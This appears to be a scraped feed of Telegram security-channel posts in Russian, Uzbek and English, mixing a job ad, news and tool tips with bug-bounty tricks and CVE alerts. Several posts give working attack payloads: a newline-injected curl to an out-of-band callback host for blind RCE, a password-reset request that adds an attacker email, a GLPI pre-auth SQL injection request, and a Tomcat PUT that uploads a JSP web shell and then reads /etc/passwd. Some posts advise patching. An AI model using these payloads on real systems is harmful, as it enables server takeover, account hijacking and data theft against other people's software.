Образование и опыт:
Опыт работы 2–5 лет в сфере сетевой безопасности.
Глубокие знания сетевых протоколов и технологий (BGP, OSPF, VLAN, IPsec).
Навыки и знания:
Администрирование и настройка SIEM-систем (Splunk, QRadar).
Опыт работы с WAF, DLP, PAM, IAM.
Работа с NGFW (Next-Gen Firewall) и межсетевыми экранами (FortiGate, Palo Alto, Cisco ASA).
Анализ уязвимостей и тестирование на проникновение (pentest).
Опыт работы с Linux/Windows на продвинутом уровне.
Желательные сертификаты:
Cisco CCNP Security
Fortinet NSE 4-7
@sherzodubaydullaev
Yoki Junior Network Engineer bo'lsa ham bo'ladi
Опыт работы 2–5 лет в сфере сетевой безопасности.
Глубокие знания сетевых протоколов и технологий (BGP, OSPF, VLAN, IPsec).
Навыки и знания:
Администрирование и настройка SIEM-систем (Splunk, QRadar).
Опыт работы с WAF, DLP, PAM, IAM.
Работа с NGFW (Next-Gen Firewall) и межсетевыми экранами (FortiGate, Palo Alto, Cisco ASA).
Анализ уязвимостей и тестирование на проникновение (pentest).
Опыт работы с Linux/Windows на продвинутом уровне.
Желательные сертификаты:
Cisco CCNP Security
Fortinet NSE 4-7
@sherzodubaydullaev
Yoki Junior Network Engineer bo'lsa ham bo'ladi
Forwarded from OSINT
Индия начала зачистку OSINT-платформ
#OSINT #News
Власти Индии объявили охоту на OSINT-сервисы, которые занимаются сбором и продажей утечек, взломанных баз и даркнет-данных. В официальном заявлении отмечается, что подобные действия нарушают законы о персональных данных и представляют угрозу национальной безопасности.
⚠️ Под удар попали платформы, работающие с leaked data, dark web и hack dumps — теперь правоохранители и спецслужбы займутся их блокировкой и уголовным преследованием.
🔗 Подробнее: The420.in
LH | Новости | Курсы | OSINT
#OSINT #News
Власти Индии объявили охоту на OSINT-сервисы, которые занимаются сбором и продажей утечек, взломанных баз и даркнет-данных. В официальном заявлении отмечается, что подобные действия нарушают законы о персональных данных и представляют угрозу национальной безопасности.
LH | Новости | Курсы | OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
POC: https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main
Pre-Auth SQL Injection
CVE-2025-24799
Severity : Critical
#CVE
Pre-Auth SQL Injection
CVE-2025-24799
Severity : Critical
#CVE
👍1
Forwarded from Brut Security (Emon Shaikh)
🔥Never forget to check for blind RCE!💥
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE — still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline — URL encoded)
And boom — Blind RCE triggered! My server got the hit instantly.
Cybersecurity isn’t about effort — it’s about mindset. Deep thinking always wins over brute force.❤️
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE — still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline — URL encoded)
And boom — Blind RCE triggered! My server got the hit instantly.
Cybersecurity isn’t about effort — it’s about mindset. Deep thinking always wins over brute force.❤️
Password Reset Bypass Trick 🌀
Some poorly secured endpoints accept multiple email parameters.😳
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emails… you’re in.⚡
Now imagine if the victim is an admin — hello dashboard, hello bounty!💰
#bugbountytips
Some poorly secured endpoints accept multiple email parameters.😳
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emails… you’re in.⚡
Now imagine if the victim is an admin — hello dashboard, hello bounty!💰
#bugbountytips
🔥You can find💥
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)🧐😎
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass ✅
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)🧐😎
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass ✅
👏1
Apache Tomcat: Potential RCE
Severity : Critical
CVE-2025-24813
POC: https://github.com/MuhammadWaseem29/CVE-2025-24813
#CVE
Severity : Critical
CVE-2025-24813
POC: https://github.com/MuhammadWaseem29/CVE-2025-24813
#CVE
🚨 Снова #GLPI - Критическая уязвимость SQL-инъекции без аутентификации через /index.php/ajax/ CVE-2025-24799 и CVE-2025-24801
Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.
🛠️ Затрагивает версии до 10.0.18
✅ Исправлено в версии GLPI 10.0.18
🔍 PoC:
🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main
📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html
‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.
#CVE
Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.
🛠️ Затрагивает версии до 10.0.18
✅ Исправлено в версии GLPI 10.0.18
🔍 PoC:
POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232
<?xml version="1.0" encoding="UTF-8"?>
<xml>
<QUERY>get_params</QUERY>
<deviceid>', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#</deviceid>
<content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>
🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main
📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html
‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.
#CVE
👍1
Forwarded from SecuriXy.kz
🔥 Path Equivalence в Apache Tomcat CVE-2025-24813
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.
💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99
🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).
📦 PoC:
📥 Доступ к вебшеллу:
📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg
‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.
⛔ Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.
💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99
🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).
📦 PoC:
curl -X PUT "https://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i
📥 Доступ к вебшеллу:
curl "https://target.com/updates.jsp?cmd=cat/etc/passwd" -i
📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg
‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.
⛔ Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
Forwarded from SecuriXy.kz
💣 pgAdmin RCE CVE-2025-2945 -
Удалённое выполнение кода (RCE) в одном из самых популярных GUI-интерфейсов для PostgreSQL.
Актуально для всех версий pgAdmin ≤ 9.1
🧠 Уязвимость кроется в eval() - опасной функции, интерпретирующей строки как исполняемый код.
🎯 Уязвимые endpoints:
📌 Условия эксплуатации:
Нужна аутентификация
POST-запросы к указанным маршрутам
📉 Потенциал:
Полный захват сервера, выполнение произвольных команд, возможность lateral movement внутри инфраструктуры.
🔗 Подробнее: 👉 https://py0zz1.tistory.com/entry/Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945
https://www.youtube.com/watch?v=V2WzCmRct7s
Удалённое выполнение кода (RCE) в одном из самых популярных GUI-интерфейсов для PostgreSQL.
Актуально для всех версий pgAdmin ≤ 9.1
🧠 Уязвимость кроется в eval() - опасной функции, интерпретирующей строки как исполняемый код.
🎯 Уязвимые endpoints:
/sqleditor/query_tool/download/<int:trans_id>
/cloud/deploy
📌 Условия эксплуатации:
Нужна аутентификация
POST-запросы к указанным маршрутам
📉 Потенциал:
Полный захват сервера, выполнение произвольных команд, возможность lateral movement внутри инфраструктуры.
🔗 Подробнее: 👉 https://py0zz1.tistory.com/entry/Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945
https://www.youtube.com/watch?v=V2WzCmRct7s
👍1
Forwarded from Codeby
go install -v github.com/projectdiscovery/mapcidr/cmd/mapcidr@latest.Генерация списка IP-адресов для заданного CIDR или диапазона IP:
mapcidr -cidr 192.168.0.0/24
echo "192.168.0.0-192.168.0.5" | mapcidr
Разделение заданного CIDR на подсети по заданному количеству CIDR(-sbc 10):
mapcidr -cidr 173.0.84.0/24 -sbc 10 -silent
Разделение заданного CIDR на подсети по по количеству хостов в каждой из них(-sbh 20000):
mapcidr -cidr 173.0.84.0/16 -sbh 20000 -silent
Идеальное разделение возможно только в том случае, если желаемое количество сегментов или хостов в подсети является степенью двойки. В противном случае инструмент попытается автоматически найти наилучшую стратегию разделения для достижения желаемого результата.
Представление заданного IP-адреса в десяти поддерживаемых уникальных форматах
echo 192.168.1.154 | mapcidr -if 0 -silent
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Suggested tools for performing AWS penetration testing
https://github.com/aws/aws-cli
https://docs.aws.amazon.com/cli/latest/reference/#cli-aws
https://github.com/prowler-cloud/prowler
https://github.com/NetSPI/aws_consoler
https://github.com/zer1t0/awsenum
https://github.com/andresriancho/enumerate-iam
https://github.com/nccgroup/ScoutSuite
https://github.com/carnal0wnage/weirdAAL
https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting
#AWS #Tools #Pentest
https://github.com/aws/aws-cli
https://docs.aws.amazon.com/cli/latest/reference/#cli-aws
https://github.com/prowler-cloud/prowler
https://github.com/NetSPI/aws_consoler
https://github.com/zer1t0/awsenum
https://github.com/andresriancho/enumerate-iam
https://github.com/nccgroup/ScoutSuite
https://github.com/carnal0wnage/weirdAAL
https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting
#AWS #Tools #Pentest
GitHub
GitHub - aws/aws-cli: Universal Command Line Interface for Amazon Web Services
Universal Command Line Interface for Amazon Web Services - aws/aws-cli
Forwarded from AppSec Guy
CVE yoki CWE dasturlari tugatilishi yaxshigina impact ko'rsatadi, AppSecga ayniqsa.
Yangi chiqqan vulnerability lar track qilinib unga raqami berilmaydi, masalan CVE-2025-12345 qilib. O'zi bundan muammo yo'qqa o'xshaydi Shaptolini shu versiyasida ATO deb yozib ketaveramiz vulnerability nomini, lekin baribir confusion bo'ladi.
Impact to'g'ridan-tog'ri bizga bilinmaydi, bundan ko'proq U.S. foydalanadi o'zini assetlarida.
Yana CVE database bilan ishlaydigan Vulnerability Scanner lar ancha qiynaladi.
Lekin CWE tugatilishi katta "chaos" bo'lsa kerak) OWASP faqat 10 ta vulnerability type ko'rsatadi, vulnerability ni mana shu deb ko'rsatgani CWE yaxshi.
Hullas bu framework bilan standartlar edi dunyo shunga qarab ish qiladigan, endi aniq narsa bo'lmasa tartibsizlik bo'ladi.
P.S. CVE assignment yoniq qolarkan)
@AppSec_guy
Yangi chiqqan vulnerability lar track qilinib unga raqami berilmaydi, masalan CVE-2025-12345 qilib. O'zi bundan muammo yo'qqa o'xshaydi Shaptolini shu versiyasida ATO deb yozib ketaveramiz vulnerability nomini, lekin baribir confusion bo'ladi.
Impact to'g'ridan-tog'ri bizga bilinmaydi, bundan ko'proq U.S. foydalanadi o'zini assetlarida.
Yana CVE database bilan ishlaydigan Vulnerability Scanner lar ancha qiynaladi.
Lekin CWE tugatilishi katta "chaos" bo'lsa kerak) OWASP faqat 10 ta vulnerability type ko'rsatadi, vulnerability ni mana shu deb ko'rsatgani CWE yaxshi.
Hullas bu framework bilan standartlar edi dunyo shunga qarab ish qiladigan, endi aniq narsa bo'lmasa tartibsizlik bo'ladi.
P.S. CVE assignment yoniq qolarkan)
@AppSec_guy
image_2025-04-18_12-51-13.png
159.8 KB
ncdu — diskdagi bo‘sh joyni tahlil qilish uchun eng qulay vositalardan biri hisoblanadi. Uda yarim-grafikli interfeys mavjud, bu bizga ishlashni ancha osonlashtiradi.
ncdu Linux distributivlarida odatda oldindan o‘rnatilmagan bo‘ladi.
How to install and use:
#ncdu
ncdu Linux distributivlarida odatda oldindan o‘rnatilmagan bo‘ladi.
How to install and use:
apt install ncdu
ncdu /
#ncdu
🔥1